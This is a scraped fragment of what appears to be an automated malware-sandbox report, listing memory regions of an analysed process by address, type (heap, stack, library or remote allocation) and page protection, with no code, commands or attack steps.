unkown
|
page read and write
|
||
|
315A000
|
heap
|
page read and write
|
||
|
31C4000
|
heap
|
page read and write
|
||
|
29C60DF0000
|
heap
|
page read and write
|
||
|
1B8C7320000
|
heap
|
page read and write
|
||
|
5284000
|
heap
|
page read and write
|
||
|
1E645C9E000
|
heap
|
page read and write
|
||
|
3198000
|
heap
|
page read and write
|
||
|
2FB4000
|
heap
|
page read and write
|
||
|
311B000
|
heap
|
page read and write
|
||
|
64DF000
|
heap
|
page read and write
|
||
|
A664000
|
trusted library allocation
|
page read and write
|
||
|
2FAD000
|
heap
|
page read and write
|
||
|
1F4264C0000
|
heap
|
page read and write
|
||
|
592D000
|
stack
|
page read and write
|
||
|
2FAD000
|
heap
|
page read and write
|
||
|
2FCD000
|
heap
|
page read and write
|
||
|
6393000
|
heap
|
page read and write
|
||
|
B43DA7E000
|
stack
|
page read and write
|
||
|
64CA000
|
heap
|
page read and write
|
||
|
2F7E000
|
heap
|
page read and write
|
||
|
29C60E20000
|
heap
|
page read and write
|
||
|
A5CF000
|
stack
|
page read and write
|
||
|
1F4265D0000
|
heap
|
page read and write
|
||
|
342E000
|
stack
|
page read and write
|
||
|
32D4000
|
heap
|
page read and write
|
||
|
2F9E000
|
heap
|
page read and write
|
||
|
1B8C7340000
|
heap
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
1B8C7310000
|
heap
|
page read and write
|
||
|
6393000
|
heap
|
page read and write
|
||
|
3437000
|
heap
|
page read and write
|
||
|
56AF000
|
stack
|
page read and write
|
||
|
2FB8000
|
heap
|
page read and write
|
||
|
2F4A000
|
heap
|
page read and write
|
||
|
7FF8BFAB9000
|
unkown
|
page read and write
|
||
|
29C62940000
|
heap
|
page read and write
|
||
|
3030000
|
heap
|
page read and write
|
||
|
64CA000
|
heap
|
page read and write
|
||
|
5AB0000
|
trusted library allocation
|
page read and write
|
||
|
1F427F60000
|
heap
|
page read and write
|
||
|
343A000
|
heap
|
page read and write
|
||
|
632F000
|
stack
|
page read and write
|
||
|
A39D000
|
heap
|
page read and write
|
||
|
3176000
|
heap
|
page read and write
|
||
|
638D000
|
heap
|
page read and write
|
||
|
64DF000
|
heap
|
page read and write
|
||
|
2FB4000
|
heap
|
page read and write
|
||
|
64D3000
|
heap
|
page read and write
|
||
|
6350000
|
heap
|
page read and write
|
||
|
2FAD000
|
heap
|
page read and write
|
||
|
1F4265A0000
|
heap
|
page read and write
|
||
|
2F7E000
|
heap
|
page read and write
|
||
|
DC46B5D000
|
stack
|
page read and write
|
||
|
1B8C7368000
|
heap
|
page read and write
|
||
|
A10D000
|
heap
|
page read and write
|
||
|
3158000
|
heap
|
page read and write
|
||
|
2FC4000
|
heap
|
page read and write
|
||
|
311B000
|
heap
|
page read and write
|
||
|
510E000
|
stack
|
page read and write
|
||
|
3171000
|
heap
|
page read and write
|
||
|
31C3000
|
heap
|
page read and write
|
||
|
319E000
|
heap
|
page read and write
|
||
|
1F426890000
|
heap
|
page read and write
|
||
|
3450000
|
heap
|
page read and write
|
||
|
64D9000
|
heap
|
page read and write
|
||
|
2FA9000
|
heap
|
page read and write
|
||
|
2FD8000
|
heap
|
page read and write
|
||
|
2F40000
|
heap
|
page read and write
|
||
|
30D8000
|
heap
|
page read and write
|
||
|
3166000
|
heap
|
page read and write
|
||
|
3080000
|
heap
|
page read and write
|
||
|
3178000
|
heap
|
page read and write
|
||
|
A3EF000
|
heap
|
page read and write
|
||
|
3199000
|
heap
|
page read and write
|
||
|
3169000
|
heap
|
page read and write
|
||
|
1E645B50000
|
heap
|
page read and write
|
||
|
1E645CA0000
|
heap
|
page read and write
|
||
|
1800DD10000
|
heap
|
page read and write
|
||
|
319E000
|
heap
|
page read and write
|
||
|
325E000
|
stack
|
page read and write
|
||
|
7FF8BFAB1000
|
unkown
|
page execute read
|
||
|
317E000
|
heap
|
page read and write
|
||
|
51DE000
|
stack
|
page read and write
|
||
|
A660000
|
trusted library allocation
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
2F71000
|
heap
|
page read and write
|
||
|
2FF8000
|
heap
|
page read and write
|
||
|
6376000
|
heap
|
page read and write
|
||
|
1800DDF0000
|
heap
|
page read and write
|
||
|
335B69C000
|
stack
|
page read and write
|
||
|
3430000
|
heap
|
page read and write
|
||
|
2F5A000
|
heap
|
page read and write
|
||
|
1E645C5F000
|
heap
|
page read and write
|
||
|
6378000
|
heap
|
page read and write
|
||
|
6395000
|
heap
|
page read and write
|
||
|
3125000
|
heap
|
page read and write
|
||
|
2FD5000
|
heap
|
page read and write
|
||
|
2FF8000
|
heap
|
page read and write
|
||
|
2F0D48C000
|
stack
|
page read and write
|
||
|
58BE000
|
stack
|
page read and write
|
||
|
5080000
|
heap
|
page read and write
|
||
|
3166000
|
heap
|
page read and write
|
||
|
A720000
|
heap
|
page read and write
|
||
|
B43D8FE000
|
stack
|
page read and write
|
||
|
2F92000
|
heap
|
page read and write
|
||
|
1800DE48000
|
heap
|
page read and write
|
||
|
B43DB7B000
|
stack
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
2FC8000
|
heap
|
page read and write
|
||
|
3150000
|
heap
|
page read and write
|
||
|
2F5A000
|
heap
|
page read and write
|
||
|
5990000
|
trusted library allocation
|
page read and write
|
||
|
5040000
|
heap
|
page read and write
|
||
|
6396000
|
heap
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
3181000
|
heap
|
page read and write
|
||
|
622E000
|
stack
|
page read and write
|
||
|
2FC8000
|
heap
|
page read and write
|
||
|
1E645BE3000
|
heap
|
page read and write
|
||
|
6352000
|
heap
|
page read and write
|
||
|
2F9C000
|
heap
|
page read and write
|
||
|
2B7E000
|
stack
|
page read and write
|
||
|
B43DC77000
|
stack
|
page read and write
|
||
|
2FA9000
|
heap
|
page read and write
|
||
|
3160000
|
heap
|
page read and write
|
||
|
A100000
|
heap
|
page read and write
|
||
|
2FD6000
|
heap
|
page read and write
|
||
|
AA9C000
|
stack
|
page read and write
|
||
|
310F000
|
heap
|
page read and write
|
||
|
1E6479B0000
|
remote allocation
|
page read and write
|
||
|
A71C000
|
stack
|
page read and write
|
There are 439 hidden memdumps, click here to show them.